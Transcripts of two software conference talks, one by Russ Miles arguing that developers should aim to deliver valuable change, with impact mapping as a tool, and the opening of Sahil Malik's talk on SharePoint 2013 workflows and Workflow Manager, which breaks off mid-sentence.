ingrained in the process there, see what's going. If everything's fine, thank you very much. You've come in. You've validated what we're doing. Brilliant. Everyone's happy. So off I went to see the users. This is where the confession comes in. Within about ten minutes of being with these particular users who are lovely people, I realized that everything we were doing was wrong. We had the right team. We had the right choice of technology stack. There was enough interesting new stuff to play with and lots of old stuff to work with that gave us a comfortable level of experience that we could meet the estimates that were beginning to be formed. So we had the right team. We had the right estimates. We understood the business problem and we were still doing the wrong thing. I want to just leave you with that because by the end of the talk, we'll come back to it and I'll explain exactly why we were doing the wrong thing. In the interim, I'm going to take you on a bit of a journey because I don't want this to be a negative talk. I don't want this to be one of those, oh, we do stuff wrong still. I would like to remind ourselves first that we've actually done an awful lot. Well, we've come a long way. So I'm absolutely appalling at remembering names and dates. It's one of the reasons I have quite so many relationships that end tragically. I'm rubbish with names and dates. So when it comes to historical stories, there's only one story I can tell you which is my own and I may get the names and dates wrong. So if anyone invented anything in here and I get your name wrong, I'm sorry. But just please, I mean to get it right. So my story started about 12 to 14, maybe 15, 16 years ago now, crikey. And you can imagine me on my first day fresh-faced turning up to my newt my first professional software delivery role. I'd done software before. I can best describe it as chaotic, anger-driven development. Anger in that I worked with a sociopath who had made me almost cry on several occasions because I hadn't figured out what was in his head. So I came to this big organization. I thought, well, that was a small org. Maybe that's how small orgs work. I went to a big org and I went to a big organization and the guy sat me down. The interview was extremely smug. Lovely guy as it turns out, but very smug. And the first thing he said to me in my impressionable state was, we know how to do software. And I thought, wow, great. Think about my career here. I'm going to be a head of everyone else. I keep hearing about a software crisis. These guys have solved it. Brilliant. So I was there. I was ready. I thought, great, I'm in the right place. We know how to do software delivery. We spend on average nine months on every project. I thought, that's good. As far as I can remember, when I was working on stuff, it was panic driven and it was done. We didn't deliver anything, but we still panicked all the time. So nine months sounds fairly orderly. So I'm feeling all right still. And then he dropped the bombshell. We spend eight months modeling, writing diagrams, beta testing, a brand new tool, the industry, it's going to revolutionize the world. This is called rational rows. And you are going to use this tool and you are, seriously, eight months of this work. And then the last month, and I swear, he gave exactly this physical motion. He said, for the last month, we cranked the handle and there the code is done. The monkey on the organ, you drop monkey poo. There's your software done. I didn't know that at the time. I was just thinking, wow, that's brilliant. And then every project we do is on time and to budget. Job done. I'm in. All I've got to do is work with these people and my career is finished. Brilliant. Okay. So I stayed with that company for eight years. I swear, I never saw a project finished on time to budget. I never saw any software actually delivered that ended up in operational use. So I learned a lot about how not to do software. And during that time, there were several shifts, groundswells. This was the first one. This was this idea of forward engineering. Who did forward engineering? Who was part of companies that did forward engineering? As I get older, the audience gets younger, and less hands go up. Okay. Yeah, there's a few. Forward engineering. Wasn't that a great idea? We're going to do models. We're going to think a lot about this software, although the thinking got downplayed a touch. We're going to do a lot of models. We're going to review a lot, and then we're going to drop a stinking part of code. Then they said, well, that maybe doesn't work. Okay. Maybe the code is a little bit more important than that. Maybe we'll do reverse engineering. Maybe we'll start with the code, and then come to your model. Which means, ironically, the code looks all right, then the model looks like a steaming pile of monkey poo. So the final gambit was this whole idea of round-trip engineering, which felt sort of desperate to me. It was kind of, well, forward didn't work. Reverse isn't working particularly well. Maybe we'll just go around in circles. So we have round-trip engineering, which I think there's a good analogy out there for how it felt, which was driving swiftly towards a cliff, sticking it in reverse, sticking it forward, and trying not to go off the cliff. So it wasn't a huge step forward. It certainly didn't deliver on the promises that it had made. At that point, in other parts of the industry, bear in mind I was still doing forward reverse and waiting for the one project that would finish in nine months. The rest of the industry was starting to be sensible. There were some very smart people, again, I'm rubbish for names, very smart people that had got together and decided that this was madness, and that there were better ways of building software. And regardless of the techniques that each individual brought to the table, they couldn't really agree on those. It was much easier, eventually, to agree on the principles that underlie things. And they came up, obviously, with the Agile Manifesto. So we're all familiar with that, I'm sure. And there were these techniques, and these started to eke their way into my delivery life. I started to move out of the organization I was in and into other more fruitful endeavors. And these were the sorts of techniques that were beginning to play in. And I felt that these techniques and these frameworks for a process were quite useful, but I didn't like the whole culture of, thou shalt this. There was too much doctrine. There was too much, do it this way, otherwise you're not doing it. You're not doing Agile if you're not doing that. And so I spent a lot of my time thinking this was irrational and picking up pieces of these different techniques and tools and building processes with teams that started to help them deliver. Because I've been so scarred by eight years of not delivering, the only thing I wanted to see was what delivery looked like. I was desperate. So I started to pick and choose from these things as a desperate man would and use them to help teams deliver, and the teams I was in. And I kept augmenting my toolbox. TDD became an important part of my life. I now pretty much write the majority of my code that way, although I'm sure if anyone's been to Dan's talk earlier, you'll see there are times when TDD doesn't necessarily, isn't necessarily the right tool to pick up. Nothing is the magic screwdriver. But TDD was very useful. Dan then rebranded it just when everyone was getting used to it. And it's Dan here. Dan said he might pop along. Hi, spiting me because I didn't go to his earlier. So BDD, we can talk about Dan since he's not here. BDD, which was essentially Dan saying, we do TDD a little bit oddly, maybe if we rebrand it and reframe it a touch, we can do it well. And I think he was right. And then more recently, specification by example appeared. And anyone using specification by example at all? Yeah? Pretty useful technique. That's its pluses and minuses. Not easy to apply. Simple technique, not easy to apply. That seems to be a common theme in our industry. Specification by example, which essentially gave us a set of rules to create minimal specifications for our software. And all of these tools were helping us to deliver valuable software, which is good. That was the problem as it was framed. That was the goal. Everything extended out. Another very smart group of people that I cannot remember many of their names, got together and talked about craftsmanship, put in the code front and center, which was very different from how I'd been with this whole idea of UML and forward and reversing and that sort of game. Code became the important player that it should be in our lives when we write software. And there were all sorts of approaches, principles, patterns that could be applied to these things. And we're still developing these patterns today. The one I like to pull out is design patterns. Does anyone remember their first experience with design patterns? That first day, when you've just done the design patterns course or you've just read, head first design patterns or you've just done something with design patterns. And you come in to write your next piece of code. Do you remember what that next piece of code looked like? Do you remember how many patterns they applied in it? I think most of them in mine, because that seems to be a common pattern I see everywhere, ironically. It's a pattern for patterns. The first day back from a patterns course, the first piece of software written, tends to exhibit every pattern in the catalog for something like Hello World. So over usage of these things, I think we can say this for all of these techniques. Over reliance on any of these techniques ended up being that rubbish piece of code that had patterns applied to everything. So we experimented, at least I did, experimented with all these techniques over the course of about ten years, trying each avenue, seeing which ones worked for different teams. All with the end goal in place of delivering valuable software frequently. And I saw a general trend as well towards simpler approaches. Kanban is somewhat simpler than the structured approaches of scrum. So I saw a lot of teams moving from one to the other, and then a bit back again. There was a lot of gradual change in the industry, in my clients, as they adopted simpler and simpler techniques. So that was a trend in the industry I saw as well. And the way I helped to guide what techniques that I concentrated on learning was which is the simplest one, which makes my life simpler, getting towards this goal of delivering valuable software frequently. And then in retrospect, it became a bit of an epiphany. If we look back, and I don't know if your experience has been the same as mine, if you look back over the last ten years, you will have explored a lot of different options. You will have tried perhaps scrum, perhaps you're still trying it. You maybe have tried software Kanban approaches. You may have tried a little bit of XP, you'll have tried a little bit of TDD. You'll mix this all together, and maybe you're delivering stuff now. So that's actually really good. What we've done is we've explored the options of a roadmap. If someone had said to you ten years ago, can you deliver software frequently? And I want you to pick the one set of tools and approaches to make sure that happens. You probably have struggled. At least I know I did. At the time, my answer would have been forward engineering and rational rows. That guy told me it works. But essentially what we've done is we've explored and experimented with these techniques. And we've now come, I believe, reasonably frequently, to delivering valuable software frequently. Problem solved then. Aren't we done? Well, given the context of my initial story around we can have all these things working and still not be doing the right thing, I would put to you that I don't think we're done. What we've done, if we look back, is going from then to now, we've gone from deliver never, or deliver nothing, or maybe deliver something eventually possibly, to deliver something. And if you're getting it really right, you're starting to deliver valuable software, which was one of the principles. And this is better. I think it is better. But it has been unfortunately oversimplified. We've optimized the engine. We have made sure that our engine as software developers is gleaming. We're applying practices so that we can continuously deliver, we can make sure that we're writing the great software, we can collaborate more. These are all good things, don't get me wrong. But it's an oversimplification. Because of our goal. Why we do what we do is an oversimplification, in my opinion. Deliver valuable software is less important if we need to broaden it from delivering valuable software to deliver valuable change. I will go back to my contextual story to explain why in a bit. But this is the big takeaway from this talk, I would like you to think a little bit, and don't feel too dirty by this, as a change agent. You are an agent of change. I'm sorry, you are. You deliver things. And those things have an impact on the world. Every time you write a piece of code, you have impact on your team. It's true. You have an impact on time scales and everything else that's going on. But ultimately you also have an impact on the world around you. And if we forget that, we end up with a turbocharged, gleaming, wonderful engine that is firing on all cylinders in the wrong direction. Okay, so what does this mean to where we may go as software developers in the future? If you accept my proposition that we should think a little bit more about the change, the impact that our software has. Well, there are a number of techniques appearing in the industry for just this issue. Only two weeks ago I had a meeting with a lot of great people in New York, again, names rubbish. Some wonderful people in New York who were discussing why, are we done yet? Is software done yet? And the conclusion is, no, it's not. Because we do deliver valuable software, but sometimes software is the problem. Because people don't buy software. Not really. I know that's going to be a bit of a strange thing for anyone from Microsoft. You guys basically invented buying software. But people don't really want the software. What they want to do is do something. They want the impact. They want to change their lives. Right now, situation now is not great. I need to do something. Situation then, I kind of want to be different so I can do something. I don't want to buy Microsoft Word. That's not really why I'm interested in. I just want to write the freaking document that I've got to pass to some company that's still using Microsoft Word. So what they want is a change. The techniques that I'd like you to consider and start looking at, if you take this idea of broadening our role to be more interested in change, techniques such as real options. Anyone looking at real options at the moment when they're building their product roadmaps or anything like that? Okay, look at it. Impact mapping. I have a small confession to make again. Impact mapping is a technique for building a road map, not a road. Anyone here involved in building product roadmaps? Not always the case at a Dev conference. That's fine. Product roadmaps, the ones I experience, tend to look a bit like this. We start here today, then we do this thing and that has this benefit, hopefully. Then we do this other thing and then we're done. We spent this much money and that's our product road map. That's not a road map. That's a road. Worse, it's probably a tunnel. You go in one end and you've got to get out the other end. There's no exploration of the challenge. There's no exploration of the problem space between the two points. What impact mapping tries to do is ask you what impact should the software make? What change do you want to enable? Then explore the options of how you get there. Sometimes it will be write a three tier system with actors and scarler, possibly. Sometimes it might be build a new iPhone app. But unless you explore the possibilities to enable that goal, you could be missing a huge trick. These techniques, you hope, are being used by the product owners or the stakeholders. Truthfully, I haven't encountered them being used very often. They're just on the cusp of being introduced. As developers, we can use these same techniques. When I'm trying to make a change in my software and I've got plenty of options of how I can do it, I pick the simplest option. How do I know it's the simplest option? I use impact mapping to help me brainstorm the options about what I could do. Then I pick something to try to get to my goal. Even at the level of software development design architecture decisions, impact mapping has a place. It's just a thinking tool, but it has a role to play. The broader scheme of things helps you understand that if you have a goal to meet, there are lots of ways of getting there. I did an impact mapping workshop at Qcon this year. One of the goals that have been set, so you generally come up with a goal first, why are we doing anything at all? That's your first question. Why do anything? If the situation now is okay, why do anything at all? Let's go do something else valuable. Assuming that there's something wrong with situation now, the goal could have been set as an example. We need to reduce the costs of the call centre. As developers, the first thing we think about is how to solve that problem. What software could help the problem? What are we going to build? Do you know what there's a sneaky nastiness to this as well? We don't just think about what we're going to build. We start to think about what could we build it in because it will be fun. There's a lovely piece of research into why developers produce complex solutions. Why do you think anyone will shout out why we build complex solutions? It's fun. Talent. It's fun. Actually, that's really close. There's actually a negative end on it, which is your business problem is boring. Writing code is more fun and we want to write code. We're so bored by doing your transformation of your data again, we'd rather pick a complex solution and do it. We're not consciously doing it. It's actually a desire internally. It's something that some of us should be aware of it. Given this idea of a call centre, the simplest answer, well, what is it? Anyone want to suggest what the simplest answer might be? Close it down. Get rid of it. That's not a call centre anymore. Job done. What you get, of course, is the business stakeholder going, we can't do that because then we'll lose all these clients. They'll get annoyed and go away. You've oversimplified your goal then because your goal was as simple as reduce the costs. That's easy. We can do that. I'll give you one other example that Goiko gives, which is a lovely example. Goiko Adzic is the gentleman who brought together a number of techniques into impact mapping. He gives the example of going to see a head of IT who is asked, why am I here? Goiko says, why am I here? What do you need to do? What's the change? What's the impact you'd like me to make? This particular gentleman turns around and says, I've currently got a £40 million budget for my IT department. I would really love you to come in and increase it to an £80 million budget. We can do that. We can do that easily. Let's go buy a couple of super yachts and go have some fun on the med. Seriously, this was a conversation as it went, was you just want to spend more money? Brilliant. That's easy. Let's go have a beer. Of course, it was an oversimplified goal. That's the gnarly truth of goals. If you oversimplify them, you get what you're looking for. It's all well and good having an impact map of how to get there, but you have to assess every part of the impact map to make sure that the goal is valid. My posit to you is that the real goal should be to deliver valuable change. I wrote an article for the developer magazine that they're giving away at the conference, which is titled, Stop Wasting Your Life. I would like you to consider the impact your software has. If you don't know what it is, ask. Find out. It has an impact. Somewhere it must have an impact. Even if the impact is just business longevity, it's an impact. Find out your impact. As developers, we should be aware of the impact we make, because that will make us more responsible people about what impact we're making on the world. That's a really huge deal to know the impact you're making, because then you can start to make different decisions. At this point, I usually start to lose the audience just a touch, because if you're a developer in a team, you'll be starting to think, if I turn round to someone and say, you don't need any software, you could just do it a different way, I've lost my job. It's not true. What happens in my experience is that when someone turns around and says, actually, you don't need software to solve this, you could do something else, they very quickly jump to, what else can we do? We still got the budget. We still got the team. What else can we do? Can we deliver something else that's even more valuable? Do we have a different goal that we can achieve? There's always a bigger fish to fry. So don't be frightened of saying that that one is simple and easy. We can achieve that now and get you the goal you want, because it's not oversimplified, we can just achieve it. And maybe we'll do software for something else that's more complex. So back to my confession, my story originally, great team, great practices, great processes, minimal processes, well understood problem space. Hopefully now it's becoming obvious. What the issue was is I discovered that they didn't need to build any software. If they had constructed an impact map, as I did in the first 10 minutes of arriving and seeing the user's work, they would have realized that the options for solving that process problem could have been far simpler than build some software. Building software is the hard thing. Okay? It was going to cost two years worth of 20 people, me included, it was going to be massive. It's going to be fun, don't get me wrong. But by exploring it in an impact map, I found that really they didn't need to do any of that. The whole process could be solved by a wall and some sticky notes. Because what was happening is people were repeating this calculation from these multiple sources over and over again because they were not sharing the answers. These answers didn't change very often. So by simply putting these things on a wall, if you've got to use technology, stick them on a screen somewhere. They could have overcome the process problem and dramatically reduced their costs and got those people doing something more valuable. What do you think happened next when I spoke to the stakeholder and told them this? Anyone shout it out? What do you think their reaction was? Disbelief. Disbelief? Yes? A first disbelief. But I had an impact map and I could show them very visually if you do these things, you get most of the benefit you're looking for. Tragically, they still did the project and they're still doing it now. They still built that software. They still spent millions on something that a few sticky notes would have almost achieved, almost in its entirety. So, don't end on too much of an exif, but at least exploring the problem and thinking like someone who's going to try to make a change rather than just deliver software, I could at least inform the client or your business or your teams on how to achieve an impact differently, perhaps with less effort, perhaps more simply. Because we need to beat this guy. Now that we've got our engine working well as developers, and this usually happens at these sorts of conferences, you get the best developers at a conference. I often say the only difference between me and you is someone's got to stand up here. So, you are probably, I would suggest, are probably in teams that are already delivering and feel good about what you're delivering. I'm asking you to come out your conference zone just a touch further to help beat this guy. You may not even know you're doing this, but if you find that the business isn't really getting the tangible benefits, the impact from what you're doing, then that's something I think you should be aware of. And then you can start to influence what you build, what impact you make. Okay, quick summary, I believe. I'm suggesting it's all fine and dandy to be a software developer, but I would really rather you think like a change developer. In order to think like a change developer, you've got to make one small change. What impact is happening because of what you're doing? Some businesses won't like you asking. I've had awkward conversations where developers have said, why are we doing what we're doing? And someone said, well, you just got to do it, you're the developers. That silo of knowledge is worth gradually wearing down because as developers, you will make better decisions if you understand the impact that's trying to be made. Move from delivering valuable software to delivering valuable change, thinking that way. Software is just one option. Use techniques like impact mapping to explore the potential options to achieve something valuable, some valuable change. An experiment, right? When you're trying to get to the goal of a valuable change, don't take the first route to it and go, that looks good because down that road is more than likely, if you're like me, like most developers, software lies. I want you to explore what else could be done. Impact mapping is just one tool for that. Five Y's is another. But when you come across these areas, some people ask, how would you navigate? So how do I start off on my impact map where I do something and I move to the next level, I'm moving towards this goal and how do I choose a route through? You experiment. Truthfully, you look at what next transition you can make with the smallest amount of effort. You look for measurements of success towards your end goal. Okay? This is all part of impact mapping. And personally, for me, the ultimate answer for which route should I take is what is the simplest answer? What can get me towards the end goal in the simplest way? Not the easiest. Okay? Be very careful about this. It's not that the next jump is tremendously easy. It is the simplest option. It leaves more options open to me than the other options that are there. I often get asked for a definition of simplicity at this point. For me, simplicity is the removal of entanglement to the point where no value is lost. Okay? It's reduce, reduce, reduce. For reducing me further, I'm going to lose something important. Over simplification is everything else on the scale. The point at which you've lost something valuable. Again, coming back to that example of if the goal was to reduce call centre cost, that's a very simplified goal. If shutting it, which is a perfectly valid mechanism of doing that, is a good answer and everyone's fine, doesn't sacrifice value, then we're fine. Chances are that's an oversimplified goal. And make the right impact. I want you to always ask one question if you don't mind. What if no software is needed at all? If software isn't needed at all. Okay? What if you didn't need any software? Because software is one of the hardest things to build and get right. And our jobs could include not using software. It used to. Back in the day, I'm old enough to remember being given problems, not given solutions. Okay? These days, we seem to be married to the idea that we are going to be told to build some software, and therefore we build some software. But I can remember back in the day when you're collaborating with the businesses, where they said, look, I've just got a problem, please help. Which was actually a better position to be in, because then I could explore the options. And it's great if no software is needed. Because you're still contributing, you're still doing something valuable. Okay? Thank you very much for your time this afternoon. Thank you for coming to the talk. And I hope you have an excellent conference. And I hope to see you around at some point. Grab me if you see me looking. Wandering around looking lost. Okay, thank you very much.
|
In this talk, Russ Miles (principal consultant at Simplicity Itself) will share the patterns and anti-patterns he's observed when teams attempt to really deliver valuable software. Taking an irreverent view of the goals, architectures, technologies and processes that have become part of our everyday lives, Russ in typical polemical style aims to impart real principles and practices that guide him when helping teams deliver, especially when sometimes they've forgotten how to do that at all! Russ aims to help you never look at what you do for a living the same way again and start delivering valuable software frequently and speedily now.
|
10.5446/51502 (DOI)
|
Okay, let's roll. So, this talk is about workflows in SharePoint 2013. I assume all of you are somewhat familiar with SharePoint. SharePoint 2010 at least, and you've tried and used SharePoint in general, and especially the workflows part of SharePoint 2010. And this talk takes from that knowledge base and basically talks about what are the new enhancements in workflows in SharePoint 2013, and how we can benefit from them. I think if you've attended any of my previous talks, I've been to Norway various times, and I've never been a proponent of workflows. Workflows in SharePoint 2010 and 2007. I've done various trainings over here, and in every training I've basically said, avoid it. Avoid SharePoint 2007 workflows, avoid SharePoint 2010 workflows. It's not that they're bad or what is, the vision is very good, but I just didn't think they were, the biggest problem was performance and scalability, and developing them wasn't a lot of fun either. So has the situation changed in SharePoint 2013? Well, let's find out. So a little bit about me. My name is Sahil Malik. I live in Washington, D.C., but I travel quite a bit. And I'm a trainer and a consultant. My areas of interest are SharePoint, SQL Server,.NET, and iOS. iOS is basically like Objective C programming and all. I think it's time that, I feel we should all look into diversifying our skills, and that's one of the things that I've been doing. And I work mostly in America and Europe. I live in America, but I'm in Europe quite a bit. And my next trainings here in Norway are there with Program with Wickeling in Fornebu, and the next training is on September 2nd on WCF 4.5. After that, it's September 9th, SharePoint 2013, and Office 365, end to end 5-day training. And then the next one after that is in London on November 25th on WCF 4.5. So let's talk a bit about, you know, what is the value of workflow, right? We are techies, and you know, when Microsoft releases this new surface tablet, we get pretty excited and some of us go and buy it, right? Why do we buy it? Of course, we love technology. That's part of it. But the other, you know, thought behind this is that it's an investment in our career. We want to learn what is new, right? We want to write VINIT apps, and we don't want to work with an emulator. We want a real device to try things out, right? And, you know, the surface tablet is $499 or $599. They're selling it for $99 at TechEd, I heard. And it's an investment. And if it breaks, you know, you can return it and get a new one. It's a very predictable investment. But still, we think for a long time before we make that purchase. Now, think of it from a company's perspective. A company wants to start a project because they want some automation done using software. And the rules are in the business user's heads, and basically they hire a team. A team of developers, a project manager, and so on and so forth. And, you know, when you hire a developer, in the first one hour or even 30 minutes, he costs more than the surface tablet cost you, right? And then it's not really until, you know, a month later that you know if he or she is any good, right? So, and also the failure rate of projects is quite high, right? So, you know, most projects and many projects go over the timelines and etc. My point is it's a huge investment for a company to hire developers and write software. And this proposition of a business user being able to craft the, you know, the flow of what they're trying to accomplish in a tool like Vizio, something that they're already very familiar with, and have it running without involving a developer, that is very, very compelling. And that is the challenge that, you know, workflow tries to solve. So, a brief history on workflows in the Microsoft platform. You know, workflows in SharePoint have always been three stories out of the box workflows, some that come right out of SharePoint. SharePoint designer-based workflows that you can craft them on your own. And Visual Studio-based workflows where you want to, you know, add some logic that Microsoft didn't think of. So, in 2007 is when, you know, SharePoint and workflow were introduced to us. Workflow Foundation was a part of.NET 3.0. And SharePoint 2007 was the first engine or client that has implemented workflow introduced in.NET 3.0 inside of SharePoint. So, whenever you run a workflow in SharePoint, workflow as in 2007 and 2010, that workflow is basically a class, and the class gets instantiated, and it runs inside of a process called ows-timer.exe. And the way this works is that if you've created, let's say, an approval workflow, and there are 15, 20 instances of approval workflow running on your farm, there is one instance of that class created in ows-timer.exe. And as you go from, you know, activity to activity, it doesn't matter how many users you have, doesn't matter how many instances of the workflow you have running, you are multiplexing one instance of that class. So, what happens is that their entire state of the workflow has to be read out of the database, hydrated into that class, and then that activity runs, and then the whole thing gets dehydrated back into the database. So, essentially workflows are single threaded, but the bigger problem over here is that, you know, the workflows, they have to pay a big penalty for the serialization, deserialization cost. And in SharePoint, the database you're saving to is the content database, which is not the best performing database, it's not like finely tuned for performance, let's call it that. And also the objects that you're hydrating and dehydrating are very, very heavy. As a result, workflows in SharePoint 2007 suffered from performance and scalability concerns, right? So there are various limits, like, you know, you can only have 100 events running at a time. You can only have 15 workflows per web front end in a farm, right? Just 15, right? And these limits are obviously tweakable, but even at 15, even with the out-of-the-box workflows like approval, etc., which is literally just like a one-step workflow, it would really, really hammer your SQL server. So performance was a big problem. Also, in SharePoint 2007, you had another, you know, situation where you had some of these out-of-the-box workflows, and, you know, using them was very, very quick. But if your boss came up and said, hey, I want to change this text at the top, you're like, well, this is going to take me four months, right? And basically, those out-of-the-box workflows were not customizable. They were what they were, you know, complete black box. So the editing experience or the ability to create new workflows was basically restricted to two tools, SharePoint Designer and Visual Studio. The problem with SharePoint Designer-based workflows in SharePoint 2007 was that you had to develop directly on production, right? It hard-coded all the GUI, it hard-tied your workflow to a particular list, right? And those workflows, you know, you could not move them from one environment to other. So when you basically moved from QA to production story was, you know, have the same guy who built the workflow in QA and have him repeat those steps carefully in production. That wasn't a very good story. You couldn't, like, export the workflow to a WSP and so on and so forth. And Visual Studio-based workflows, you know, the developing experience was fine. It wasn't the easiest. It wasn't the most intuitive. But let me just say this, that if you're editing UI, if Infopath was your best story between Infopath and ASPX, then we had a problem, right? Infopath was not the easiest thing to manage, especially when it comes to deploying across environments. So obviously workflows in SharePoint 2007, you know, had issues. But I would say Microsoft had a vision and they continued to push in that vision. So in SharePoint 2010, they introduced some changes. But one thing that could not change is workflows, even in SharePoint 2010, were.NET 3.5 SP1, which is still CLR 2.0, so they still suffered from the same performance and scalability concerns. But they introduced some very welcome changes, mostly in SharePoint Designer, some in Visual Studio, and a little bit in the API. So out of the box workflows could now be edited and modified. You can open them in SharePoint Designer, edit them as you wish, save a copy, etc. So that was a big plus. SharePoint Designer workflows now became portable, right? You could export a workflow and move it into another environment, or even import that into Visual Studio. Practically speaking, importing that into Visual Studio was not a very good alternative. I'll get to that in a second. And they introduced this capacity of being able to create Visio visualizations. So you could take basically a Visio diagram, export it. You had to use a special stencil to create it. It was called as a SharePoint 2010 workflow stencil. Export that as a VWI file, Visio workflow interchange, and then import that inside of SharePoint Designer. Or you could go the other way. So you could import that from SharePoint Designer to Visio. The end result was that an end user is crafting up a workflow visually, like drawing a diagram, and the workflow is... The user sees that diagram running inside of a page. They see that I'm on this block and the previous block, this was the output, and this is the user that approved it. So using Visio services, they were able to render it. And they improved the Visual Studio experience as in that the ASPX forms are actually pretty good now, and they used the concept of site workflows. So they made some improvements, but there was still one big problem. That workflows still did not scale. So the question is, what have they improved in SharePoint 2013? I would say before 2013, those workflows are so bad, I call them work slows. So I would say in 2013, the general story is still the same. You can go between Visio and SharePoint Designer as much as you wish, and SharePoint Designer can export a WSP, Visual Studio can export a WSP, and you can do a one-way import from SharePoint Designer to WSP. So the general story is still the same, but they've added a couple of things. Number one, the import-export story, VWI still works, but you don't need to do VWI anymore. You save it as a VSDX file, which is the XML version of the regular VSD file. So you use Visio 2013 and you save a VSDX file, and you can import that VSDX file directly inside of SharePoint Designer. So the advantage over here is that if somebody crafts a workflow, and they did not use the standard activities that you're used to in a SharePoint stencil, it could still be imported in SharePoint Designer. So usually when somebody is crafting up this workflow, what they found is that every now and then, most of the activities or the blocks they threw on the diagram were correct, but every now and then they decided to put a pretty picture for a server and you couldn't import anything. So now you can import it, obviously you can't turn it into a workflow, but inside of SharePoint Designer you can make these minor fixes. The other big thing they've introduced is that you don't even need to go between these tools anymore. Now, you still can. If somebody prefers to use Visio and only Visio and no SharePoint Designer, you can still do that. That's not a problem. But when you are inside SharePoint Designer, you can expose that Visio surface right inside of SharePoint Designer and basically be able to craft up that visualization right inside of SharePoint Designer. I'll show that in a demo pretty soon. And then obviously exporting to Visual Studio, etc. But one thing that they've introduced is now workflows can run as an app and they can run as a Sandbox solution. By the way, if somebody tells you that Sandbox solutions are deprecated or WSP's are history and you don't need to worry about them anymore, that's not true. WSP's are still very much with us and it is still required for a lot of key scenarios. In fact, when you deploy a SharePoint hosted app, a SharePoint hosted app internally builds itself using a WSP. So WSP's are not history, right? So don't forget all that knowledge that you've learned about WSP's. So I have a little quiz for you. Can anybody guess what is this picture? Looks like a pretty complicated picture. I've heard also this looks like a machine part. I've heard all sorts of answers to this. This is the out of the box approval workflow one step and I added a log to history activity at the end in SharePoint Designer and I exported that as a WSP and I imported that inside a Visual Studio. And this is what Visual Studio creates after about 30 minutes of machine getting frozen. So in this little dot that you see at the very bottom, that is the log to history activity. So the rest of it is the approval workflow. So even the out of the box approval workflow, which is probably one of the simplest workflows they have, that workflow, when you export from SharePoint Designer and import inside of Visual Studio, you can see that it's not very practical. You can't really maintain it. So basically what I'm trying to get to is that this picture right here is practically unusable. You're going to make some minor tweaks here and there, but it's not something that you can use for development. So one way export anyway, but the end result produced like this is not usable. So workflows in SharePoint 2013, let's continue diving deeper into that. Everything before this, so the work slows that we used to have before this, 2007 and 2010, now they call them SharePoint 2010 style workflows, right? And that's basically a dead end, as in all the investments that you've done in SharePoint 2010 style workflows, which is workflows in SharePoint 2010 and before, they will run in SharePoint 2013, but they run as what we call as SharePoint 2010 style workflows. No improvements there. They'll still continue to not perform well. They'll still continue to have all the problems that we had with them in the past, right? And they are available in SharePoint Foundation and all SKUs of SharePoint, but if you have SharePoint Enterprise, you know SharePoint 2013 is SharePoint server, and then you buy Cal, so if you enable the Enterprise Cal, then you can use what they call as SharePoint 2013 style workflows, right? Now these SharePoint 2013 style workflows and 2010 style workflows are completely different from each other, right? They're very different from each other. So what are SharePoint 2013 style workflows? They run in a completely separate product called as Workflow Manager. Workflow Manager is not a part of SharePoint. It is developed by a completely separate team. And SharePoint is one of the first clients that uses Workflow Manager. Could you write your own application in.NET that uses Workflow Manager? Absolutely. You can write these workflows in XAML. They don't use XAML anymore. So in fact, what you can do is they can craft up a workflow, and because SharePoint 2013 uses PowerShell 3.0, PowerShell can now instantiate these workflows very, very easily, right? And they don't even have to be SharePoint workflows. They can be any sort of workflow. And you can leverage them via SharePoint workflows, or you can leverage them via PowerShell or any other platform you wish. So they run in a completely separate product, right? And that separate product is a server, a Workflow Manager. That integrates inside of SharePoint using a couple of PowerShell scripts you have to run. So inside of Office 365, this is already set up for us, and they're using OAuth 2.0 over there. And on-premises, they use a different protocol called S2S Trust, which some people call as one-legged OAuth, right? So it's like a diet version of OAuth. S2S Trust is not a standard, but it is something that we're hoping will become a standard. But on-premises, you would register this server using S2S Trust. These workflows, because they're on outside of SharePoint, they can actually scale and perform quite well. And you can, even out of the box, even on one server environment, the performance is like hundreds of times better. Like, they're literally the same workflow written is hundreds of times better. Remember that you get 100 times better performance with the same convenience that you have in SharePoint Designer, like you can craft a workflow visually. In fact, they've made some improvements over there, too. So finally, they're sort of delivering on their promise here. And the users, however, will notice just one big difference that you can no longer attach the SharePoint 2013-style workflows to a content type. If you're very used to attaching a workflow to a content type, SharePoint 2010-style workflows can still be attached to a content type, but 2013-style workflows attach basically to the item content type. Why did Microsoft do this? Because basically attaching a workflow to a content type is a very cumbersome operation inside the scene. And especially when you update the workflow, they have to iterate through all the instances of the content type, all the inherited instances, and basically run a lot of code to fix that. So a better way to do that is basically you have the content type column available to you. You can just check it as a string, even the content type ID you have that available to you. And you can base your logic based on that, right? So they've basically, you know, you don't attach them to a content type anymore. SharePoint 2013, SharePoint Designer, what are the improvements they've made there? Number one, they've added the concept of loops, right? Doing loops in SharePoint 2010 was possible, but it was very cumbersome. There's some black knowledge that you place your activities in a certain way and you get a loop. They've introduced the concept of stages, and they've finally given us the ability to do copy-paste of activities, right? Copy, paste, cut, redo, undo. These are basic operations that you could not do in SharePoint 2010, SharePoint Designer 2010. As I mentioned, Visio is embedded inside of SharePoint Designer, and you no longer need the VWI format. You can work directly with the Visio format if you want, open that in SharePoint Designer directly. What are the improvements they've made in Visual Studio workflows? I think from a maintainability point of view, the one biggest improvement I see is that these workflows can now be deployed as apps and as sandbox solutions. One little point I'll mention I'll make is that out-of-the-box templates, when you create a workflow, it adds the workflow and it adds the feature in a SP site scope feature. That's a bug in the current Visual Studio tools even in Preview 2. What you have to do is for you to be able to see that activity or to change the scope of the feature to web, and then you'll see that feature. We'll see that in a second. One other big change that they've made is that the extensibility story is SharePoint Designer is not cutting it. I need Visual Studio to extend what workflow does. I'm going to write custom activities. There are two kinds of activities you can write, one that you should and one that you shouldn't. The ones that you should are the ones that can work in apps, they can work in sandbox solutions, and they'll work in Office 365. Those activities are completely declarative. You write them completely in XAML, and you'll see that writing that activity almost feels like you're working in SharePoint Designer. It's literally like drag drops at a bunch of properties, hit F5, and it works. Well, you have to do a little bit more than that, but it's almost that easy. You have to edit an XML file. The other kind of activity that you shouldn't write is basically what is pretty similar to what we used to do in SharePoint 2010, is that basically we would have to register the DLL, and then we have to go find this.actions file, edit it in Notepad, because WSPs couldn't update that, and if you deployed a patch like a service pack or something, you had the danger of losing your activities, and you'd have to redo those changes. It's too much of a hassle. Even on-premises, I would argue that it's too much of a hassle, so I'd just say, stay away from those sorts of writing, those sorts of activities. Instead, just use the declarative activities and put your custom logic in web services. But the bad news. The bad news, SharePoint 2010 workflows continue to suck. There are no changes there, and there is no upgradeability story from SharePoint 2010 style workflows to SharePoint 2013 workflows. So basically, if you've 